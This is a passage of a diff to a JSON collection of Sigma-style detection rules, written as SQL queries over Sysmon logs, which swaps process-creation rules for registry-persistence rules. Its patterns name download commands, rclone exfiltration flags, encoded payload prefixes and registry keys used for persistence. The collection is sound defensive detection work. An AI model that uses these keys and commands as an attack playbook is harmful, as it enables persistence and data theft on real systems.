"Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", + "status": "experimental", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", + "status": "experimental", + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate registration of IFilters by the OS or software" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_persistence_ifilter.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "Change Winevt Event Access Permission Via Registry", + "id": "7d9263bd-dc47-4a58-bc92-5474abab390c", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. (See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Excel\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Powerpoint\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\VSTO\\\\Security\\\\Inclusion\\\\%' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\integrator.exe' ESCAPE '\\' OR Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_persistence_office_vsto.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Potential Persistence Via Excel Add-in - Registry", + "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.t1137.006" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_persistence_xll.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Potential Persistence Via Custom Protocol Handler", + "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" - ], - "filename": "proc_creation_win_hktl_powertool.yml" - }, - { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", - "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.discovery" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering a new custom protocol handler" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" + "filename": "registry_set_persistence_custom_protocol_handler.yml" }, { - "title": "HackTool - Default PowerSploit/Empire Scheduled Task Creation", - "id": "56c217c3-2de2-479b-990f-5c109ba8458f", - "status": "test", - "description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "title": "Add Debugger Entry To Hangs Key For Persistence", + "id": "833ef470-fa01-4631-a79b-6f291c9ac498", + "status": "experimental", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"Hangs\" key in order to achieve persistence which will get invoked when an application crashes", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.persistence" ], "falsepositives": [ - "Unlikely" + "This value is not set by default but could be rarly used by administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\Hangs\\\\Debugger%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_hangs_debugger_persistence.yml" }, { - "title": "JSC Convert Javascript To Executable", - "id": "52788a70-f1da-40dd-8fbd-73b5865d6568", - "status": "experimental", - "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", - "author": "frack113", + "title": "Suspicious Environment Variable Has Been Registered", + "id": "966315ef-c5e1-4767-ba25-fce9c8de3660", + "status": "test", + "description": "Detects the creation of user-specific or system-wide environment variables via the registry. Which contains suspicious commands and strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.persistence" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\jsc.exe' ESCAPE '\\' AND CommandLine LIKE '%.js%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Environment\\\\%' ESCAPE '\\') AND (Details IN ('powershell', 'pwsh') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%TVqQAAMAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%TVpQAAIAAAAEAA8A%' ESCAPE '\\' OR Details LIKE '%TVqAAAEAAAAEABAA%' ESCAPE '\\' OR Details LIKE '%TVoAAAAAAAAAAAAA%' ESCAPE '\\' OR Details LIKE '%TVpTAQEAAAAEAAAA%' ESCAPE '\\' OR Details LIKE '%SW52b2tlL%' ESCAPE '\\' OR Details LIKE '%ludm9rZS%' ESCAPE '\\' OR Details LIKE '%JbnZva2Ut%' ESCAPE '\\' OR Details LIKE '%SQBuAHYAbwBrAGUALQ%' ESCAPE '\\' OR Details LIKE '%kAbgB2AG8AawBlAC0A%' ESCAPE '\\' OR Details LIKE '%JAG4AdgBvAGsAZQAtA%' ESCAPE '\\') OR (Details LIKE 'SUVY%' ESCAPE '\\' OR Details LIKE 'SQBFAF%' ESCAPE '\\' OR Details LIKE 'SQBuAH%' ESCAPE '\\' OR Details LIKE 'cwBhA%' ESCAPE '\\' OR Details LIKE 'aWV4%' ESCAPE '\\' OR Details LIKE 'aQBlA%' ESCAPE '\\' OR Details LIKE 'R2V0%' ESCAPE '\\' OR Details LIKE 'dmFy%' ESCAPE '\\' OR Details LIKE 'dgBhA%' ESCAPE '\\' OR Details LIKE 'dXNpbm%' ESCAPE '\\' OR Details LIKE 'H4sIA%' ESCAPE '\\' OR Details LIKE 'Y21k%' ESCAPE '\\' OR Details LIKE 'cABhAH%' ESCAPE '\\' OR Details LIKE 'Qzpc%' ESCAPE '\\' OR Details LIKE 'Yzpc%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_jsc.yml" + "filename": "registry_set_suspicious_env_variables.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "title": "DNS-over-HTTPS Enabled by Registry", + "id": "04b45a8a-d11d-49e4-9acc-4a1b524407a5", "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "description": "Detects when a user enables DNS-over-HTTPS.\nThis can be used to hide internet activity or be used to hide the process of exfiltrating data.\nWith this enabled organization will lose visibility into data such as query type, response and originating IP that are used to determine bad actors.\n", + "author": "Austin Songer", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.defense_evasion", + "attack.t1140", + "attack.t1112" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Edge\\\\BuiltInDnsClientEnabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Google\\\\Chrome\\\\DnsOverHttpsMode' ESCAPE '\\' AND Details = 'secure') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Mozilla\\\\Firefox\\\\DNSOverHTTPS\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_dns_over_https_enabled.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Potential Persistence Via Outlook Home Page", + "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detects potential persistence activity via outlook home pages.", + "author": "Tobias Michalski (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_persistence_outlook_homepage.yml" }, { - "title": "Findstr Launching .lnk File", - "id": "33339be3-148b-4e16-af56-ad16ec6c7e7b", + "title": "Outlook Security Settings Updated - Registry", + "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", "status": "test", - "description": "Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack", - "author": "Trent Liffick", + "description": "Detects changes to the registry values related to outlook security settings", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1202", - "attack.t1027.003" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '%.lnk' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE 